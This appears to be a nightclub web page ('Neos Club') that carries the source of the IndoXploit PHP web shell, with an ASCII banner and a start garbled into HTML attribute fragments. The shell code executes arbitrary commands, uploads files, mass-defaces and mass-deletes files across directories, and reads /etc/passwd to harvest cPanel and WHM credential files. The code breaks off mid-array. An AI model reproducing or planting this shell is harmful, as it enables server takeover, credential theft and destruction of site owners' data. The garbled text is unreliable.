___________________________
< root@indoxploit:~# w00t??? >
 ---------------------------
            ,        ,
           /(        )`
            ___   / |
            /- _  `-/  '
           (//     /
           / /   | `    
           O O   ) /    |
           `-^--'`<     '
          (_.)  _  )   /
           `.___/`    /
             `-----' /
<----. 1024="" 1048576="" 1073741824="" __="" _="" ______="" form="" method="post" input="" type="password],input[type=submit]" data-cke-saved-name="pass" name="author" php="" else="" file="" content-description:="" content-type:="" content-disposition:="" filename="'.basename($file).'" expires:="" cache-control:="" pragma:="" content-length:="" .="(($perms" meta="" content="curl_exec($curl);" charset="UTF-8" style="" import="" family="Ubuntu);" html="" background:="" color:="" font-family:="" font-size:="" width:="" li="" display:="" margin:="" padding:="" td="" .td_home="" border:="" 1px="" solid="" th="" a="" text-decoration:="" a:hover="" b="" 5px="" padding-left:="" textarea="" height:="" 10px="" resize:="" select="" option:hover="" thanks="" buat="" orang-orang="" yg="" membantu="" dalam="" proses="" pembuatan="" shell="" ini.="" ini="" tidak="" sepenuhnya="" coding="" ada="" beberapa="" function="" dan="" tools="" kita="" ambil="" dari="" yang="" sudah="" ada.="" tapi="" itu="" hasil="" kreasi="" indoxploit="" sendiri.="" tanpa="" kalian="" akan="" besar="" seperti="" sekarang.="" greetz:="" all="" member="" indoxploit.="" my="" friends.="" return="" font="" color="lime" buff="@shell_exec($cmd);" results="" as="" perms="" if="" socket="" info="" elseif="" symbolic="" link="" regular="" block="" special="" directory="" character="" fifo="" pipe="" unknown="" owner="" :="" group="" world="" s="" start="strpos($param," end="" -="" curl="curl_init($url);" npage="" npages="30000;" alllinks="array();" lll="array();" x="getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);" h2="">ON" : "OFF";
$ds = @ini_get("disable_functions");
$mysql = (function_exists('mysql_connect')) ? "ON" : "OFF";
$curl = (function_exists('curl_version')) ? "ON" : "OFF";
$wget = (exe('wget --help')) ? "ON" : "OFF";
$perl = (exe('perl --help')) ? "ON" : "OFF";
$python = (exe('python --help')) ? "ON" : "OFF";
$show_ds = (!empty($ds)) ? "$ds" : "NONE";
if(!function_exists('posix_getegid')) {
	$user = @get_current_user();
	$uid = @getmyuid();
	$gid = @getmygid();
	$group = "?";
} else {
	$uid = @posix_getpwuid(posix_geteuid());
	$gid = @posix_getgrgid(posix_getegid());
	$user = $uid['name'];
	$uid = $uid['uid'];
	$group = $gid['name'];
	$gid = $gid['gid'];
}
echo "System: ".$kernel."
";
echo "User: ".$user." (".$uid.") Group: ".$group." (".$gid.")
";
echo "Server IP: ".$ip." | Your IP: ".$_SERVER['REMOTE_ADDR']."
";
echo "HDD: $used / $total ( Free: $freespace )
";
echo "Safe Mode: $sm
";
echo "Disable Functions: $show_ds
";
echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl 
";
echo "Current DIR: ";
foreach($scdir as $c_dir => $cdir) {	
	echo "$cdir/";
}
echo "  [ ".w($dir, perms($dir))." ]";
echo "

";
echo "
";
echo "
"; echo "
"; echo "
"; if($_GET['logout'] == true) { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); echo ""; } elseif($_GET['do'] == 'upload') { echo "
"; if($_POST['upload']) { if($_POST['tipe_upload'] == 'biasa') { if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) { $act = "Uploaded! at $dir/".$_FILES['ix_file']['name'].""; } else { $act = "failed to upload file"; } } else { $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name']; $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name']; if(is_writable($_SERVER['DOCUMENT_ROOT'])) { if(@copy($_FILES['ix_file']['tmp_name'], $root)) { $act = "Uploaded! at $root -> $web"; } else { $act = "failed to upload file"; } } else { $act = "failed to upload file"; } } } echo "Upload File:
Biasa [ ".w($dir,"Writeable")." ] home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]  
"; echo $act; echo "
"; } elseif($_GET['do'] == 'cmd') { echo "
".$user."@".$ip.": ~ $  
"; if($_POST['do_cmd']) { echo "
".exe($_POST['cmd'])."
"; } } elseif($_GET['do'] == 'mass_deface') { function sabun_massal($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $lokasi
"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc,$namafile,$isi_script); } } } } } } function sabun_biasa($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $dirb/$namafile
"; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST['start']) { if($_POST['tipe_sabun'] == 'mahal') { echo "
"; sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "
"; } elseif($_POST['tipe_sabun'] == 'murah') { echo "
"; sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "
"; } } else { echo "
"; echo "
Tipe Sabun:
BiasaMassal
Folder:

Filename:

Index File:

 
"; } } elseif($_GET['do'] == 'mass_delete') { function hapus_massal($dir,$namafile) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { if(file_exists("$dir/$namafile")) { unlink("$dir/$namafile"); } } elseif($dirb === '..') { if(file_exists("".dirname($dir)."/$namafile")) { unlink("".dirname($dir)."/$namafile"); } } else { if(is_dir($dirc)) { if(is_writable($dirc)) { if(file_exists($lokasi)) { echo "[DELETED] $lokasi
"; unlink($lokasi); $idx = hapus_massal($dirc,$namafile); } } } } } } } if($_POST['start']) { echo "
"; hapus_massal($_POST['d_dir'], $_POST['d_file']); echo "
"; } else { echo "
"; echo "
Folder:

Filename:

 
"; } } elseif($_GET['do'] == 'config') { $etc = fopen("/etc/passwd", "r") or die("
Can't read /etc/passwd
"); $idx = mkdir("idx_config", 0777); $isi_htc = "Options allnRequire NonenSatisfy Any"; $htc = fopen("idx_config/.htaccess","w"); fwrite($htc, $isi_htc); while($passwd = fgets($etc)) { if($passwd == "" || !$etc) { echo "Can't read /etc/passwd"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach($user_config[1] as $user_idx) { $user_config_dir = "/home/$user_idx/public_html/"; if(is_readable($user_config_dir)) { $grab_config = array( "/home/$user_idx/.my.cnf" => "cpanel", "/home/$user_idx/.accesshash" => "WHM-accesshash",

 

Neos Club
 

A GLASS OF CHAMPAGNE FOR ALL YOUR PARTY PEOPLE!

BOOK YOUR PARTIES NOW!!!

... More

News1 More

News2 More